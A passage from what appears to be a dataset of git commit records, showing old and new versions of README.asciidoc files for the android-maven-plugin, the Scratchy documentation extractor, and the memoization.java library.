version\n","repos":"secondsun\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,hgl888\/android-maven-plugin,secondsun\/maven-android-plugin,repanda\/android-maven-plugin,Cha0sX\/android-maven-plugin,xieningtao\/android-maven-plugin,mitchhentges\/android-maven-plugin,wskplho\/android-maven-plugin,WonderCsabo\/maven-android-plugin,CJstar\/android-maven-plugin,jdegroot\/android-maven-plugin,Stuey86\/android-maven-plugin,simpligility\/android-maven-plugin,CJstar\/android-maven-plugin,jdegroot\/android-maven-plugin,psorobka\/android-maven-plugin,hgl888\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,greek1979\/maven-android-plugin,WonderCsabo\/maven-android-plugin,mitchhentges\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,Cha0sX\/android-maven-plugin,Cha0sX\/android-maven-plugin,Stuey86\/android-maven-plugin,greek1979\/maven-android-plugin,kedzie\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,kedzie\/maven-android-plugin,wskplho\/android-maven-plugin,secondsun\/maven-android-plugin,psorobka\/android-maven-plugin,repanda\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,xieningtao\/android-maven-plugin,b-cuts\/android-maven-plugin,b-cuts\/android-maven-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"== ANDROID MAVEN PLUGIN\n\nA plugin for Android application development with http:\/\/maven.apache.org[Apache Maven 3.1.1+] and \nthe http:\/\/tools.android.com[Android SDK].\n\n=== Links\n\n* http:\/\/code.google.com\/p\/maven-android-plugin[Project site] with wiki and more\n* http:\/\/code.google.com\/p\/maven-android-plugin\/issues\/list[Issue tracker]\n* http:\/\/jayway.github.io\/maven-android-plugin\/[Maven generated plugin documentation site]\n* http:\/\/www.sonatype.com\/books\/mvnref-book\/reference\/android-dev.html[Maven: Complete Reference - Chapter - Android Application Development with Maven]\n* https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/maven-android-developers[Mailinglist]\n* http:\/\/code.google.com\/p\/maven-android-plugin\/wiki\/Changelog[Changelog]\n* image:https:\/\/travis-ci.org\/jayway\/maven-android-plugin.png[\"Build Status\", link=\"https:\/\/travis-ci.org\/jayway\/maven-android-plugin\"]\n\n=== Contributions\n\nWe welcome your feature enhancements and bug fixes in pull requests!\n","old_contents":"== ANDROID MAVEN PLUGIN\n\nA plugin for Android application development with http:\/\/maven.apache.org[Apache Maven 3.0.3+] and \nthe http:\/\/tools.android.com[Android SDK].\n\n=== Links\n\n* http:\/\/code.google.com\/p\/maven-android-plugin[Project site] with wiki and more\n* http:\/\/code.google.com\/p\/maven-android-plugin\/issues\/list[Issue tracker]\n* http:\/\/jayway.github.io\/maven-android-plugin\/[Maven generated plugin documentation site]\n* http:\/\/www.sonatype.com\/books\/mvnref-book\/reference\/android-dev.html[Maven: Complete Reference - Chapter - Android Application Development with Maven]\n* https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/maven-android-developers[Mailinglist]\n* http:\/\/code.google.com\/p\/maven-android-plugin\/wiki\/Changelog[Changelog]\n* image:https:\/\/travis-ci.org\/jayway\/maven-android-plugin.png[\"Build Status\", link=\"https:\/\/travis-ci.org\/jayway\/maven-android-plugin\"]\n\n=== Contributions\n\nWe welcome your feature enhancements and bug fixes in pull requests!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db3c0e334e2ba70317ad824df1602c0dae231f22","subject":"Adding README","message":"Adding README\n","repos":"rashidkpc\/scratchy","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"\n= Scratchy =\nRashid Khan\nv0.1, 2013-11-18\n:doctype: article\n\n[preface]\n== The Scratchy Way ==\nScratchy is a simple system for extracting user focused documentation from code. Scratch is not\nfor API docs, though it could be if you really wanted.\nScratchy enforces no particular format. It's purpose is to assemble the scattered parts of your\ndocumentation in the order you specify, then drop them into a directory and file structure.\n\nWhile scratchy doesn't force a particular format, there are some recommendations.\n- Start every line in a comment with a specific character. Scratchy necessarily trims leading\nwhitespace to deal with indentation. If your formatter requires leading white space it will be\nrelative from your +--line+ argument\n\n=== Documentation Format ===\n\nIt is up to you to decide what format you wish to document in. If you were some kind of sadist\nyou could write your docs in HTML and skip the post processing\nfootnote:[Don't do that]\nThe Scratchy documentation uses Asciidoc because it serves as a powerful intermediary to many\nother formats, but you could just as easily use something like Markdown. From there you can use\nwhatever tool you'd like to post process them.\n\n=== Scratch tag ===\n\nScratchy does not want all of your comments. To denote doc blocks that scratchy should\nextract, the opening of your comment should contain the +@scratch+ tag immediately following\nthe comment opening characters.\n\n=== Scratch path ===\n\nThe scratch path tells scratchy where to put the extracted documentation. The path is a\nsimple directory path, followed by an priority number. For example, +\/intro\/welcome\/2+\nwould be written to your output directory, in the intro directory, in the 'welcome'\nfile. It would appear after +\/intro\/welcome\/1+ if it existed. Gaps in\npriority numbers are fine, as are duplicates. Of course\norder is not guaranteed with duplicate priority numbers.\n\n==== Pre-existing files ====\n\nScratchy will not overwrite your exist docs, nor will ti append to them or try to merge\nthem. You will need to move your old docs out of the way. Scratchy will not abort, but\nwill communicate that it failed to write that path\n\n== Running Scratchy ==\n\nScratchy has only one required argument +--output+, to tell scratchy where to put the docs it\nextracts. For example:\n\n scratchy -o docs\n\nWould put the extracted docs into +.\/docs+. Here is the command we used to build the docs you are\nreading right now:\n\n scratchy -uo docs -p scratchy\n\nScratchy is extracting documentation from itself! Spooky.\nIf you're wondering what those switches\ndo, see the link:..\/usage.html[Command Line reference]\n\n\n== Post-Processing ==\n\nScratchy is designed to promote post processing. Why? Because how can anyone know what format\nyou will want your documentation in, or for what purpose? Scratchy does not assume you're\nwriting API docs, nor does it assume that a web browser will be the destination for the\ndocumentation it extracts. How you choose to post process is up to you.\n\n==== How does scratchy do it? ====\n\nBecause the documentation for the Scratchy project is in ASCIIDoc, we have\nthe option of extracting it to HTML, PDF, ePub, and a host of other formats. Here is the command\nwe use to post process Scratchy's output:\n\n find docs -type file | xargs -L 1 asciidoc -a numbered -b html5 -a icons -a toc2\n\n\nNOTE: For more information, as well as usage and commandline switches, see the docs\/ directory.","old_contents":"scratchy\n========\n\nA wildly simple nodejs utility for storing userage docs in code. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6441c4f1a68655f298ebbb7c33fb2a2d9ebe9ed","subject":"Update maintenance badge","message":"Update maintenance badge\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>\n","repos":"sebhoss\/memoization.java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","old_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2016.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, 